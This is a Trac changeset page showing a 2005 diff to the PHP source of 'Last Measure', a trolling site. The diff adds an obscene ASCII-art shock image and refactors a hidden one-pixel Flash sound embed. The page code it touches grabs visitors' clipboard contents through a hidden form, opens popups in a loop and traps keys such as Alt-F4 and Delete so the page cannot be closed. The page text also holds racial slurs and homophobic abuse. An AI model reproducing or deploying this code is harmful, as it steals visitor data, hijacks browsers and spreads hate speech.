Changeset 65
- Timestamp:
- 11/23/05 09:15:38 (7 years ago)
- File:
-
- 1 edited
-
trollforge/lastmeasure/index.php (modified) (7 diffs)
Legend:
- Unmodified
- Added
- Removed
-
trollforge/lastmeasure/index.php
r64 r65 17 17 } 18 18 19 function goatse() { ?> 20 <pre> 21 * g o a t s e x * g o a t s e x * g o a t s e x * 22 g g 23 o / \ \ / \ o 24 a| | \ | | a 25 t| `. | | : t 26 s` | | \| | s 27 e \ | / / \\\ --__ \\ : e 28 x \ \/ _--~~ ~--__| \ | x 29 * \ \_-~ ~-_\ | * 30 g \_ \ _.--------.______\| | g 31 o \ \______// _ ___ _ (_(__> \ | o 32 a \ . C ___) ______ (_(____> | / a 33 t /\ | C ____)/ LAST \ (_____> |_/ t 34 s / /\| C_____) MEASURE| (___> / \ s 35 e | ( _C_____)\______/ // _/ / \ e 36 x | \ |__ \\_________// (__/ | x 37 * | \ \____) `---- --' | * 38 g | \_ ___\ /_ _/ | g 39 o | / | | \ | o 40 a | | / \ \ | a 41 t | / / | | \ |t 42 s | / / \__/\___/ | |s 43 e | / / | | | |e 44 x | | | | | |x 45 * g o a t s e x * g o a t s e x * g o a t s e x * 46 </pre> 47 <?php 48 } 19 49 20 50 function hey_everybody() { ?> 51 <object classid= "clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" 52 codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" 53 width="1" height="1" id="hey" align=""> 54 <param name="movie" value="hey.swf"></param> 55 <embed src="hey.swf" width="1" height="1" name="hey" align="" 56 type="application/x-shockwave-flash" 57 pluginspage="http://www.macromedia.com/go/getflashplayer"></embed> 58 </object> 59 <?php 60 } 21 61 22 62 ?> … … 33 73 $procreate = $_GET['procreate']; 34 74 35 if(!$popup && !$send ) {75 if(!$popup && !$send && !$procreate) { 36 76 /* Just connected! Get the clipboard */ ?> 37 77 <body> 78 <?php goatse(); ?> 38 79 <form name="clip" method="post" action="index.php" style="display:none"> 39 80 <input type="text" name="content"> … … 57 98 $files = list_images(); 58 99 ?> 59 <body background="hello.jpg" bgcolor="# FFFFFF"100 <body background="hello.jpg" bgcolor="#ffffff" 60 101 onmousemove="playBall();" onLoad="playBall();" 61 102 leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> … … 81 122 <br /> 82 123 fristage postage is mine 83 <object classid= "clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" 84 codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" 85 width="1" height="1" id="hey" align=""> 86 <param name="movie" value="hey.swf"></param> 87 <embed src="hey.swf" width="1" height="1" name="hey" align="" 88 type="application/x-shockwave-flash" 89 pluginspage="http://www.macromedia.com/go/getflashplayer"></embed> 90 </object> 124 <?php hey_everybody(); ?> 91 125 <br> 92 126 Lastmeasure last measure last-measure nero institute 93 127 </form> 94 95 128 <form name="goatse" onreset="procreate();" onsubmit="procreate();" action="" id="goatse"> 96 129 <p><span style="background-color: #ffffff; border: thin solid; color: #000000;">GNAA Gay Niggers Timecop</span></p> … … 100 133 } elseif($procreate) { 101 134 ?> 102 <body bgColor= #ffffff135 <body bgColor="#ffffff" 103 136 onload="document.goatse.reset();playBall();return true;bookmark();" 104 137 onKeyDown="altf4key();ctrlkey();delkey();" … … 110 143 fucking nigger operating system.. at least in fucking Firebird you don't 111 144 have to do this shit. 112 <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" 113 codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" 114 width="1" height="1" id="hey" align=""> 115 <param name="movie" value="hey.swf"></param> 116 <embed src="hey.swf" width="1" height="1" name="hey" align="" 117 type="application/x-shockwave-flash" 118 pluginspage="http://www.macromedia.com/go/getflashplayer"></embed> 119 </object> 120 145 <?php hey_everybody(); ?> 121 146 <form name="goatse" action="#" ONreset="procreate(); return true;"> 122 147 </form> … … 128 153 $image = get_random($files); 129 154 ?> 130 <body background="<?php echo $image;?>" bgColor= #ffffff155 <body background="<?php echo $image;?>" bgColor="#ffffff" 131 156 onload="document.goatse.reset();playBall();return true;bookmark();" 132 157 onKeyDown="altf4key();ctrlkey();delkey();"
Note: See TracChangeset
for help on using the changeset viewer.
